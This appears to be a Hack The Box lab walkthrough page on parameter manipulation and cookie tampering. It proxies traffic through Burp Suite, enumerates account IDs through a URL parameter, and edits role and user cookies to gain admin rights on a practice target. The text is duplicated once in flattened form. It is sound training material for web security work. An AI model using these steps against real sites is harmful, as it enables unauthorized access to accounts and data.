PARAMETER MANIPULATION & COOKIE TAMPERING

#walk the application
root@htb:~$ BROWSER > {targetSite:port}
 Services
 We provide services to operate manufacturing data such as quotes, 
 customer requests etc. Please login to get access to the service.

 * no visible login page identified

#crawl the webapp and conduct directory and page enumeration - either via fuzzing or crawling
#step 1: configure the browser to intercept traffic
root@oco:~$ BROWSER > Settings
 Search: Proxy
 
root@oco:~$ BROWSER > Network Settings > Settings
 Configure Proxy Access to the Internet
  Manual Proxy Configuration: enabled
  HTTP Proxy: 127.0.0.1
  Port: 8080 {default Burp listening port}
  Also Use this Proxy for HTTPS: enabled
  
 * it is advisable to also check the option of "Also use this proxy for FTP and HTTPS" IOT have all requests go through BurpSuite
 
step 2: #disable Burp Intercept
root@oco:~$ burpsuite &
BURP > Proxy > Intercept
 Intercept is on: disabled

 * Burp's intercept is enabled by default
 
step 3: passively crawl the target site
root@oco:~$ BROWSER > {targetSite:port}

 * can also simply refresh the page if already on the target site
 
step 4: identify pertinent pages in burpsuite
BURP > Target > Site Map > ...
 http://10.129.203.93
  -> /
  -> cdn-cgi
      -> login
          -> script.js
  -> css
  -> js
  -> themes

#identification
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest

 * can also brute force the page
 * identify possible entry points on the webapp
    - Account page
       Access ID	Name	Email
       2233	guest	guest@megacorp.com
    - Uploads page; this requires admin privileges
    
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > F12 > Storage > Cookies
 name     value
 role     guest  ...
 user     2233   ...

root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > Account Link
 http://10.129.203.93/cdn-cgi/login/admin.php?content=accounts&id=2
 
 * guest account ID is shown...admin id can be enumerated by changing the ID value manually or through automated means

#enumeration
root@htb:~$ BROWSER > http://10.129.203.93/cdn-cgi/login/admin.php?content=accounts&id=2
 Access ID	Name	Email
 34322	admin	admin@megacorp.com

  * enumerate for the admin account by changing the id value to something else until found
     - admin info identified
     
#exploit via changing cookie value
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > F12 > Storage > Cookies
 name     value
 role     admin   ...
 user     34322   ...

 * reload the page to escalate privilege to admin

PreviousPLAINTEXT REFERENCES NextENCODED REFERENCES

Last updated 1 month ago

#walk the application root@htb:~$ BROWSER > {targetSite:port} Services We provide services to operate manufacturing data such as quotes, customer requests etc. Please login to get access to the service. * no visible login page identified

#crawl the webapp and conduct directory and page enumeration - either via fuzzing or crawling #step 1: configure the browser to intercept traffic root@oco:~$ BROWSER > Settings Search: Proxy root@oco:~$ BROWSER > Network Settings > Settings Configure Proxy Access to the Internet Manual Proxy Configuration: enabled HTTP Proxy: 127.0.0.1 Port: 8080 {default Burp listening port} Also Use this Proxy for HTTPS: enabled * it is advisable to also check the option of "Also use this proxy for FTP and HTTPS" IOT have all requests go through BurpSuite step 2: #disable Burp Intercept root@oco:~$ burpsuite & BURP > Proxy > Intercept Intercept is on: disabled * Burp's intercept is enabled by default step 3: passively crawl the target site root@oco:~$ BROWSER > {targetSite:port} * can also simply refresh the page if already on the target site step 4: identify pertinent pages in burpsuite BURP > Target > Site Map > ... http://10.129.203.93 -> / -> cdn-cgi -> login -> script.js -> css -> js -> themes

#identification root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest * can also brute force the page * identify possible entry points on the webapp - Account page Access ID Name Email 2233 guest guest@megacorp.com - Uploads page; this requires admin privileges root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > F12 > Storage > Cookies name value role guest ... user 2233 ... root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > Account Link http://10.129.203.93/cdn-cgi/login/admin.php?content=accounts&id=2 * guest account ID is shown...admin id can be enumerated by changing the ID value manually or through automated means

#enumeration root@htb:~$ BROWSER > http://10.129.203.93/cdn-cgi/login/admin.php?content=accounts&id=2 Access ID Name Email 34322 admin admin@megacorp.com * enumerate for the admin account by changing the id value to something else until found - admin info identified #exploit via changing cookie value root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > F12 > Storage > Cookies name value role admin ... user 34322 ... * reload the page to escalate privilege to admin